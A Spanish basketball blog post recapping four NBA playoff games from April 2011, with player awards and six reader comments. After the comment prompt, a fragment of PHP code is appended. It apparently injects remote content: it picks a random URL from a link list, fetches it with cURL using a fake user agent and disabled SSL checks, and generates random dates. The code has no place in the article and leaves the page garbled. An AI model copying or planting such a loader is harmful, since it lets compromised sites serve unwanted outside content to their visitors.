Playoffs (23/04/2011): Brandon Roy ha vuelto

24 de April de 2011 por txusma

Noche con sabor a Playoffs con 4 duelos igualadísimos decididos todos por el canto de un duro.

En Portland, Brandon Roy lideró a los suyos a una remontada histórica en el último cuarto. Llegaron 18 abajo pero un acierto del 75% en tiros de campo y una actuación sin una sola pérdida de balón les permitió anotar 20 puntos más que la franquicia tejana y llevarse el partido en los últimos segundos. En este último cuarto, Roy repartió 4 asistencias y anotó 12 puntos, muchos en la parte final del encuentro donde encadenó canasta tras canasta, incluído un 3+1, ante el delirio de los aficionados que llenaban el Rose Garden (82-84). 2 a 2 y la serie que se presenta tan igualada como se presuponía.

Por su parte, Memphis pone el 2-1 en su eliminatoria gracias, de nuevo, a Zach Randolph y Marc Gasol. El primero anotó 23 puntos y un triple decisivo en el último minuto que hizo contener la respiración de todos sus compañeros mientras volaba hacia la canasta. El segundo aportó 17 puntos y 9 rebotes en un partido que los ositos dominaron en su mayor parte (88-91). En un par de días se juega el cuarto partido y los Grizzlies quieren ser el cuarto equipo que, siendo el octavo de su conferencia, elimina al primero. Están en disposición de conseguirlo.

Si las dos eliminatorias anteriores se presentan muy igualadas, no se puede decir lo mismo de las otras 2 que se jugaron anoche a pesar de la victoria de los Pacers en el Conseco Fieldhouse. En teoría, Indiana jugaba en casa, pero la llegada de miles de aficionados de los Bulls que llegaron con ganas de ser testigos de la barrida de su equipo, convirtió el ambiente en hostil hacia el teórico equipo de casa. Los abucheos que recibió Danny Granger a falta de 14 segundos al lanzar tiros libres ejemplerizan perfectamente la situación. Pero esta vez los Pacers no se arrugaron en el último cuarto y sacaron adelante un partido en el que controlaron perfectamente a Derrick Rose que está sufriendo de li lindo en los partidos fuera de casa (84-89). 3-1 y los Bulls que deberán sudar mucho todavía.

Y finalmente, los Thunder se ponen 3-0 con Durant y Westbrook haciendo su trabajo y recibiendo una ayuda diferente cada día. Si en el primer partido fue Eric Maynor y en el segundo James Harden, anoche fue el turno de Serge Ibaka que cuajó el mejor partido de su carrera en el mejor momento posible. Los Thunder dominaron el partido pero los Nuggets llegaron a ponerse a un solo punto en un último minuto increíble de JR Smith. El escolta tuvo el triple para empatar pero falló en una más que probable falta de James Harden (97-94). Ningún equipo en la historia ha sido capaz de remontar un 3-0 y vista la solidez de los Thunder no parece que Denver vaya a ser el primero.

PREMIOS

MVP: Serge Ibaka acaba de quemar otra etapa como su jugador en la NBA. Sus 22 puntos, 16 rebotes y 4 tapones conforman su mejor partido desde que está en la liga y lo consigue en Playoffs, el habitat natura de los grandes jugadores.

Sorpresa: Paul George está jugando un papel muy importante defendiendo a Derrick Rose en muchas fases de los partidos frente los Bulls. Si además es capaz de anotar 9 puntos, coger 5 rebotes y robar un par de balones, pues ya es perfecto.

Decepción: A Derrick Rose le están vigilando muy de cerca en el Conseco. Anoche intentó 22 tiros a canasta pero solo anotó 6.

Esfuerzo en vano: Tim Duncan estuvo muy controlado pero aún así fue capaz de anotar 13 puntos, capturar 11 rebotes y repartir 6 asistencias. Lo mejor de los Spurs.

Comenta

6 comentarios a esta entrada

  1. Rompe dice:
    #1

    Qué lujazo tener a Roy para salir desde el banco!
    Y saliendo desde el banco, en su misma posición… La temporada de Rudy ha sido mala, pero en PO simplemente está horrible! No llega siquiera al 20% en acierto!

      Citar

  2. max dice:
    #2

    Vaya play-offs se está marcando Marc Gasol! Él y Zach se están comiendo a los Spurs. Por otra parte, Tony Allen y Sam Young no tienen el glamour de Rudy Gay, pero como defienden los tíos, mucho más y mejor que el teórico jugador franquicia. Jugando así, veo a Memphis en segunda ronda.

      Citar

  3. xapa_croack dice:
    #3

    la resurrección de Brandon, cuando más lo necesitaban. Veo muy fuertes a los Thunders.

      Citar

  4. Antoine Doinel dice:
    #4

    Yo a quien veo fuertes es a los Grizzlies. Aun así, dudo que si pasan esta, puedan contra Oklahoma.
    Por cierto, se sabe si la lesión de Rose es grave?

      Citar

  5. ralage dice:
    #5

    Menudo último 4º de the Natural, un must see para cualquiera al que le guste la NBA.
    Se hablará también de la defensa de los Mavs(con razón), pero es que de todos los colores las enchufó,para mi el MVP de hoy, mucho más allá de los números, y es que no se remontan 18 pts en PO todos los días.

    También estoy contento por el triunfo de Indiana,ya que por lo visto en la serie, no se merecian ser barridos

      Citar

  6. Toni dice:
    #6

    Welcome again Mr Roy. Llamadme exagerado pero su 4º cuarto estuvo al nivel del Kobe de las grandes ocasiones, increible.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>